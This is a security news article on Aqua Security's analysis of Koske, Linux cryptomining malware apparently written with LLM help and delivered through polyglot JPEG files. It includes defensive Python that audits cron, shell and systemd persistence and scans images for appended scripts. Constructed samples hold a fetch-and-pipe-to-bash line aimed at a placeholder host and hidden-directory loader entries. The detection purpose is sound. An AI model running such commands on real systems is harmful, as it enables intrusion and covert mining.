Koske Marks a Significant Step in AI-Created Malware: Aqua Security
A sophisticated new Linux cryptomining malware dubbed “Koske” is offering security teams a taste of what’s on the horizon as threat actors become more proficient with generative AI.
Koske shows an “unsettling shift” toward AI-generated malware that is nearing the point of being as good as, or better than, malware built by humans, while bringing the advantages that AI offers to malware development, according to Assaf Morag, director of security research at Aqua Security.
“The line between human and machine-generated threats is starting to blur,” Morag wrote in a recent report, adding that Koske “shows clear signs of AI-assisted development, likely with help from a large language model [LLM]. With modular payloads, evasive rootkits, and delivery through weaponized image files, Koske represents a new breed of persistent and adaptable malware built for one purpose: cryptomining. It is a warning of what is to come.”
The introduction of generative AI into the mainstream with OpenAI’s release of ChatGPT in November 2022 set off an AI-vs.-AI confrontation in the cybersecurity field, with vendors injecting the rapidly evolving technology into their security products and services and bad actors embracing it for their own activities.
AI a Mixed Bag for Hackers – For Now
For cybercriminals, generative AI lowers the barrier to entry by automating the development of malicious code and improving evasion and information-gathering techniques. That said, there are challenges as well, including acquiring the expertise needed to build AI systems and the high-quality data needed to train models.
“Developing malware to exploit vulnerabilities takes time, effort, and expertise,” security firm CyberArk wrote in a report late last year. “Given the aptitude that generative AIs have for writing code, it’s no surprise that threat actors are using them to do exactly that. Of course, as with most content a generative AI puts out, the first draft of that malicious code will likely be quite rough around the edges. But it’s a start – and it still lowers the gateway to entry for new threat actors – and makes experienced hackers more efficient.”
Even more alarming, threat actors can use generative AI to more easily create polymorphic malware that adapts and changes as the situation evolves, which CyberArk (itself being acquired by Palo Alto Networks for $25 billion) wrote “will also continue to complicate matters for enterprise antivirus systems.”
According to Gartner analysts, attackers will increasingly use AI tools and LLMs for large-scale social engineering attacks, adding that by 2027, 17% of all cyberattacks and data leaks will involve generative AI.
AI-Boosted Evasion and Persistence
Aqua’s Morag wrote that Koske’s operators begin their attack by exploiting a misconfigured server, installing backdoors, and downloading two “seemingly harmless JPEG images from shortened URLs. These images are polyglot files, with malicious payloads appended to the end. Once downloaded, the malware extracts and executes the malicious segments in memory, bypassing antivirus tools.”
The malware also includes what he called “unusual” evasion and persistence techniques, “boosted” by AI, that can exploit misconfigurations or vulnerabilities. They include shell configuration hijacking, system boot manipulation, cron jobs scheduled every 30 minutes and on reboot, and dedicated system services that install a self-starting downloader and execution manager.
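The persistence mechanisms listed above (cron entries firing every 30 minutes and at reboot, shell rc files that run a downloader, a self-restarting system service) are the kind of thing a defender can audit with a small script. The Python below is an added example written for this article, not code from Aqua’s report or from Koske itself. It applies a few heuristics (execution from world-writable directories, hidden directory components, download-and-pipe-to-shell, plus schedule and restart context) to three constructed inputs embedded in the file: a crontab, a ~/.bashrc and a systemd unit. The paths, the hidden directory names and the placeholder URL are invented for the sample.

```python
import re
from dataclasses import dataclass, field

# Constructed sample inputs (not real Koske artifacts): each has benign entries
# plus one or two entries shaped like the persistence techniques described above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/30 * * * * /dev/shm/.hid/loader >/dev/null 2>&1
@reboot nohup /tmp/.x/update.sh &
"""

SAMPLE_BASHRC = """\
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
(curl -fsSL http://example.invalid/p.jpg | tail -c 4096 | bash) >/dev/null 2>&1 &
"""

SAMPLE_UNIT = """\
[Unit]
Description=System update helper
After=network-online.target

[Service]
ExecStart=/dev/shm/.hid/loader
Restart=always

[Install]
WantedBy=multi-user.target
"""

WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")          # a path component starting with '.'


@dataclass
class Finding:
    source: str
    line: str
    reasons: list[str] = field(default_factory=list)


def suspicious_command(cmd: str) -> list[str]:
    """Heuristics for a command line that a persistence mechanism would run."""
    reasons = []
    if any(d in cmd for d in WRITABLE_DIRS):
        reasons.append("executes from a world-writable directory")
    if HIDDEN_DIR.search(cmd):
        reasons.append("path contains a hidden directory")
    if DOWNLOAD_AND_RUN.search(cmd):
        reasons.append("downloads content and pipes it to a shell")
    return reasons


def audit_crontab(text: str, source: str = "crontab") -> list[Finding]:
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)          # five schedule fields, then the command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        reasons = suspicious_command(cmd)
        if reasons:                              # schedule is context, not evidence on its own
            if sched == "@reboot":
                reasons.append("runs at boot")
            elif sched.startswith("*/30 "):
                reasons.append("runs every 30 minutes")
            findings.append(Finding(source, line, reasons))
    return findings


def audit_shell_rc(text: str, source: str = "~/.bashrc") -> list[Finding]:
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            reasons = suspicious_command(line)
            if reasons:
                findings.append(Finding(source, line, reasons))
    return findings


def audit_systemd_unit(text: str, source: str = "unit") -> list[Finding]:
    findings = []
    restart_always = any(l.strip() == "Restart=always" for l in text.splitlines())
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("ExecStart="):
            reasons = suspicious_command(line.partition("=")[2])
            if reasons:
                if restart_always:
                    reasons.append("self-restarting service")
                findings.append(Finding(source, line, reasons))
    return findings


def audit_all() -> list[Finding]:
    return (audit_crontab(SAMPLE_CRONTAB)
            + audit_shell_rc(SAMPLE_BASHRC)
            + audit_systemd_unit(SAMPLE_UNIT, "helper.service"))


if __name__ == "__main__":
    for f in audit_all():
        print(f"[{f.source}] {f.line}\n    " + "; ".join(f.reasons))
```

On a live host the same functions would be fed the output of `crontab -l` for each user, the files under /etc/cron.d, the shell rc files in each home directory, and the unit files under /etc/systemd/system; a 30-minute schedule or a Restart=always line is reported only alongside a command that already looks wrong, which keeps legitimate maintenance jobs out of the results.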
“Main and secondary payloads are delivered via dual-use image files,” Morag wrote. “The threat actors append malicious shell scripts to legitimate image files (e.g., panda bear pictures), which are hidden inside images and kept on legitimate and free image storage platforms (freeimage, postimage and OVH images).”
The technique, a “sneaky form” of polyglot file abuse or malicious file embedding, pairs a valid JPG file with a malicious shell script appended at the end; only the last bytes are downloaded and executed, he wrote.
The file blends image data with an executable payload to evade detection. A further payload, extracted from an image of a panda bear, is a rootkit that hides files, directories, and processes from monitoring tools by filtering directory entries that match specific names or a PID it reads. There are also networking and DNS evasion tactics.
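A defender can check an image for this kind of polyglot abuse by walking the JPEG marker structure to the EOI marker and inspecting whatever follows it. The Python below is an added example written for this article, not code from Aqua’s report or from Koske; it builds a structurally valid (not decodable) JPEG skeleton in the file, appends a constructed shell script to it the way a polyglot would carry one, and reports whether the trailing bytes look like a script. The placeholder URL in the sample is invented.

```python
import re

# TEM, SOI, EOI and RST0-7 carry no length field; every other marker does.
STANDALONE_MARKERS = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))
SCRIPT_HINT = re.compile(rb"\b(bash|sh|curl|wget|eval|base64)\b")


def jpeg_end_offset(data: bytes) -> int:
    """Walk the JPEG marker segments and return the offset just past EOI,
    or -1 if the bytes are not a parseable JPEG."""
    if not data.startswith(b"\xff\xd8"):
        return -1
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return -1                            # not at a marker boundary: malformed
        marker = data[pos + 1]
        if marker == 0xFF:                       # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:
            return pos + 2                       # EOI: the image ends here
        if marker in STANDALONE_MARKERS:
            pos += 2
            continue
        if pos + 4 > len(data):
            return -1
        pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")  # length counts its own two bytes
        if marker == 0xDA:                       # SOS: entropy-coded data runs until the next real marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                        # 0xFF00 is byte stuffing, RSTn belong to the scan
                pos += 1
    return -1


def trailing_payload(data: bytes) -> bytes:
    """Bytes after the EOI marker; empty if there are none or the file is not a JPEG."""
    end = jpeg_end_offset(data)
    return data[end:] if end >= 0 else b""


def looks_like_script(tail: bytes) -> bool:
    head = tail.lstrip()[:512]
    return head.startswith(b"#!") or SCRIPT_HINT.search(head) is not None


def scan_image(data: bytes) -> dict:
    tail = trailing_payload(data)
    return {
        "parseable": jpeg_end_offset(data) >= 0,
        "trailing_bytes": len(tail),
        "script_like": looks_like_script(tail),
    }


# Constructed sample: SOI, a JFIF APP0 segment, a one-component SOS header,
# a few bytes of "scan data" containing a stuffed 0xFF00, then EOI.
CLEAN_JPEG = (
    b"\xff\xd8"
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    b"\x12\x34\xff\x00\x56"
    b"\xff\xd9"
)
# The same image with a shell script appended, as a polyglot would carry it (constructed).
POLYGLOT_JPEG = CLEAN_JPEG + (
    b"\n#!/bin/bash\n"
    b"curl -fsSL http://example.invalid/p.jpg | tail -c 4096 | bash\n"
)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_JPEG), ("polyglot", POLYGLOT_JPEG)):
        print(name, scan_image(blob))
```

The parser checks marker structure only, not that the image decodes, which is all this use case needs: a viewer stops at EOI, so anything after it is never rendered and is only ever read by code that knows to look for it. Trailing bytes alone are not proof of tampering (some cameras and editors leave junk after EOI), so the script-like test is what turns a hit into a finding; a reasonable follow-up is to run the same check on any image a process fetched from a URL shortener or a free image host.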
Bring in the LLM
Adaptive, AI-like behavior includes tri-layer connectivity checks that verify access to GitHub, remediation steps, and proxy brute-forcing that dynamically discovers working proxies from GitHub-hosted lists by testing SOCKS5 and HTTP proxies in parallel. Koske supports 18 cryptocurrencies and deploys CPU- or GPU-optimized miners according to the capabilities of the host.
There are also signs in the malware’s scripts that point to the use of an LLM, including verbose and well-constructed comments, defensive scripting in the logic flow, and obfuscated authorship through Serbian phrases and neutralized syntax.
“While using AI to generate better code already poses a challenge for defenders, it’s only the beginning,” Morag wrote. “The real game-changer is AI-powered malware, which is malicious software that dynamically interacts with AI models to adapt its behavior in real-time. This kind of capability could mark a meteoric leap in adversaries’ tactics, putting countless systems at serious risk.”